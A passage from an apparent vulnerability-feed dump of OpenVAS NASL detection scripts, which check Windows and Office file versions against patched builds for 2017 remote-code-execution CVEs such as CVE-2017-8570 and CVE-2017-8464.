get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(15\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office15\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"15.0\", test_version2:\"15.0.4945.1000\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '15.0 - 15.0.4945.1000' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:53", "description": "This host is missing an important security\n update according to Microsoft KB3213640", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811232", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811232\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:22:24 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213640\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2007 Service Pack 3.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213640\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(12\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office12\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"12.0\", test_version2:\"12.0.6772.4999\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '12.0 - 12.0.6772.4999' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:27:31", "description": "This host is missing an important security\n update according to Microsoft KB3213545", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811231", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811231\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:14:16 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213545\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2016.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213545\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## MS Office\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"ProgramFilesDir\");\nif(!path){\n exit(0);\n}\n\n##For x86 based installation\n##To Do, Check path for 64bit installation and update path here\noffPath = path + \"\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\Office16\";\n\nif(officeVer =~ \"^16\\.*\")\n{\n offdllVer = fetch_file_version(sysPath:offPath, file_name:\"mso30win32client.dll\");\n if(!offdllVer){\n exit(0);\n }\n\n if(offdllVer =~ \"^16\\.0\" && version_is_less(version:offdllVer, test_version:\"16.0.4561.1002\"))\n {\n report = 'File checked: ' + offPath + \"\\mso30win32client.dll\" + '\\n' +\n 'File version: ' + offdllVer + '\\n' +\n 'Vulnerable range: ' + \"16.0 - 16.0.4561.1001\" + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:55", "description": "This host is missing a critical security\n update according to Microsoft security update KB4022839.", "cvss3": {}, "published": "2017-06-16T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8464\", \"CVE-2017-8543\", \"CVE-2017-8552\");\n script_bugtraq_id(98818, 98824, 99035);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-16 16:41:25 +0530 (Fri, 16 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security update KB4022839.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error exists in 'Win32k' when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n\n - An error in the Windows Search which fails to handles objects in memory.\n\n - An error in .LNK file due to processing of shortcut LNK references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs.\n View, change, or delete data, or create new accounts with full user rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-ph/help/4022839\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.2.9200.22164\"))\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22164' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:47:14", "description": "Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8461", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8487", "CVE-2017-8552", "CVE-2017-0176"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108777", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108777\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-8543\", \"CVE-2017-8464\", \"CVE-2017-8461\", \"CVE-2017-8487\", \"CVE-2017-8552\", \"CVE-2017-0176\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.\");\n\n script_tag(name:\"insight\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8. Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation. (Vulnerability ID: HWPSIRT-2017-06114,HWPSIRT-2017-06115,HWPSIRT-2017-06131,HWPSIRT-2017-06133,HWPSIRT-2017-06153 and HWPSIRT-2017-06154)The six vulnerabilities have been assigned six Common Vulnerabilities and Exposures (CVE) IDs: CVE-2017-0176, CVE-2017-8461, CVE-2017-8464, CVE-2017-8487, CVE-2017-8543 and CVE-2017-8552.Huawei has released software updates to fix these vulnerabilities. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation.\");\n\n script_tag(name:\"affected\", value:\"AnyOffice versions V200R002C10\n\nN2000 Appliance versions V100R001C00\n\nOceanStor 18500 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor 18800 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor Backup Software versions V100R001C00\n\nSMC2.0 versions V100R003C10 V100R005C00 V500R002C00 V600R006C00\n\nSecospace AntiDDoS8000 versions V100R001C00\n\nSecospace AntiDDoS8160 versions V100R001C00SPC300\n\nUC Audio Recorder versions V100R001C01\n\nUMA versions V300R001C00\n\neLog versions V200R003C10\n\neSpace ECS versions V200R003C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170909-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:17", "description": "This host is missing a critical security\n update according to Microsoft KB4022718", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811178", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811178\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8469\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821, 98914,\n 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826, 98929,\n 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98840, 98867, 98869, 98870, 98884, 98901, 98887, 98900, 98818,\n 98848, 98849, 98842);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 17:00:32 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection(DIBSection) function.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe and Windows Kernel-Mode\n Drivers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs, view, change, or delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:02", "description": "This host is missing a critical security\n update according to Microsoft KB4022722", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022722)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811168", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022722)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811168\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\", \"CVE-2017-0287\",\n \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\", \"CVE-2017-8543\",\n \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8462\",\n \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923, 98929,\n 98858, 98859, 98847, 98860, 98940, 98837, 98839, 98864, 